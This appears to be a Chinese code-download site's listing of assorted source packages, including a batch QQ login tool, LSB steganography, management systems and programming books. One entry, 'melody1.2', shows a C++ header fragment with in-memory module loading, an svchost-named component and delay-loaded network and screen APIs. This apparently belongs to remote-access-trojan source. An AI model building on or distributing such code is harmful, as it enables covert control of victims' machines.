-
C# 批量登陆QQ源码下载
C# 批量登陆QQ源码下载
- 2021-02-05 10:39:57下载
- 积分:1
-
java视频直播、聊天室、弹幕、多端适配
JAVA直播后台源码
- 2019-06-21下载
- 积分:1
-
xy64
用BCB6.04编写的舍6入5看齐,奇进偶不进的数值修约法
根据GB8170—87《数值修约规则》[2]及GB3101—93附录B《数值修约规则》[3],修约时不能简单地采用“4舍5入”的办法。应遵循的原则是:①拟舍弃的数字的最左一位数字等于、小于4,则舍去;大于、等于6,则进1。②拟舍弃数字的最左一位数字等于5,若其右边数字并非全部为“0”时,则进1;其右边数字皆为“0”时,所拟保留的末位数字若为奇数则进1,若为偶数或“0”则不进。(BCB6.04 prepared with care in line 6 to 5, Ki Jin Jin does not even repair some of the numerical method in accordance with GB8170-87 Numerical revision of the rules [2] and GB3101-93 Appendix B Numerical revision of the rules [3], when revision can not simply use 4 homes 5 in approach. Should follow the principle is: ① to give up most of the figures, a figure equivalent to the left, less than 4, then rounding greater than, equal to 6, then enter 1. ② figures to be the most left-up a digital equivalent to 5, if not all of the right figure for the 0 , then enter 1 its right figures are 0 when the bottom of the figures to be retained if it is an odd number into 1, if an even number or 0 does not enter.)
- 2008-04-25 11:58:05下载
- 积分:1
-
LSB
通过python实现对bmp图片的lsb隐藏(LSB hiding BMP pictures by Python)
- 2021-04-26 20:28:45下载
- 积分:1
-
OKAir
说明: 奥凯航空内部资源管理系统 首页:登录、注册、密码修改,信息管理:数据字典资产分类、公司职员信息、系统用户。资产信息管理:资产信息管理包括:检索、新增、入库、编辑、金融资产信息管理、车辆信息管理、不动产信息管理。资产管理:资产流转管理、金融资产流转管理、不动产流转管理。(Aokai internal resource management system homepage: login, registration, password modification, information management: data dictionary asset classification, company employee information, system user. Asset information management: asset information management includes retrieval, adding, warehousing, editing, financial asset information management, vehicle information management, real estate information management. Asset management: asset circulation management, financial asset circulation management, real estate circulation management.)
- 2020-12-25 18:19:04下载
- 积分:1
-
mianji
充分理解对象的创建和使用过程,并对构造器有一定的了解。(Fully understand the object to create and use the constructor I have some knowledge about.)
- 2007-11-28 16:44:28下载
- 积分:1
-
C++ GUI Qt4 编程
说明: 教程详细讲述了使用更新的Qt版本进行图形用户界面应用程序开发的各个方面。全书分为四个部分,共24章及4个附录:第一部分介绍Qt的基础知识和编写图形用户界面应用程序时所需的基本概念;第二和第三部分主要讲解Qt的中、高级编程,包括布局管理、事件处理、二维/三维图形、拖放、项视图类、容器类、输入/输出、数据库、多线程、网络、XML、国际化、嵌入式编程等内容;第四部分为附录,分别介绍了Qt的获取和安装、Qt应用程序的构建、Qt Jambi和C++的基础知识。(QT software tutorial)
- 2020-11-16 10:06:23下载
- 积分:1
-
宿舍管理系统+
说明: Javaweb 学生宿舍管理系统 可大作业 毕业设计项目 有两个权限 系统管理员和学生 对学生宿舍增删改查批量删除ajax调用函数分页 模糊查询 记住登陆 过滤器 js调用 前端用的bootstrap框架 有时间和富文本编辑框小插件 可以用作作业或者项目考试绝对没问题的(Java web student dormitory management system can be large homework graduation project. There are two rights system administrators and students to add, delete, check, batch delete Ajax call function paged fuzzy query to student dormitory. Remember that bootstrap framework used in the front-end of landing filter JS call has time and rich text edit box plug-in which can be used as homework or project exam absolutely no problem.)
- 2021-03-14 13:19:23下载
- 积分:1
-
melody1.2 源码
#include "MemoryModule.h"
#include "resource.h"
#include "C_svchost.h"
typedef int (WINAPI *PFN_POPMSGBOX)(void);
#pragma comment(linker, "/DELAYLOAD:WININET.dll")
#pragma comment(linker, "/DELAYLOAD:WS2_32.dll")
#pragma comment(linker, "/DELAYLOAD:PSAPI.DLL")
#pragma comment(linker, "/DELAYLOAD:GDI32.dll")
#pragma comment(linker, "/DELAYLOAD:ADVAPI32.dll")
#pragma comment(linker, "/DELAYLOAD:SHELL32.dll")
#pragma comment(linker, "/DELAYLOAD:SHLWAPI.dll")
#pragma comment(linker, "/DELAYLOAD:MSVFW32.dll")
#pragma comment(linker, "/DELAYLOAD:WINMM.dll")
#pragma comment(linker, "/DELAYLOAD:USER32.dll")
#pragma comment(linker, "/DELAYLOAD:WTSAPI32.dll")
#pragma comment(linker, "/DELAYLOAD:IMM32.dll")
#pragma comment(linker, "/DELAY:nobind")
#pragma comment(linker, "/DELAY:unload")
#pragma comment(lib, "DELAYIMP.LIB")
#pragma comment(linker, "/DELAYLOAD:USER32
- 2022-08-24 08:05:56下载
- 积分:1
-
从Python开始学编程
说明: 本书以Python为样本,不仅介绍了编程的基本概念,还着重讲解了 编程语言的范式(面向过程、面向对象、面向函数),并把编程语言的 范式糅在Python中,让读者不仅学会Python,未来在学习其他编程语言 时也变得更加容易。(aking Python as a sample, this book not only introduces the basic concepts of programming, but also focuses on the programming language paradigm (process-oriented, object-oriented, function-oriented), and incorporates the programming language paradigm into Python, so that readers can not only learn Python, but also become easier to learn other programming languages in the future.)
- 2020-06-18 03:00:02下载
- 积分:1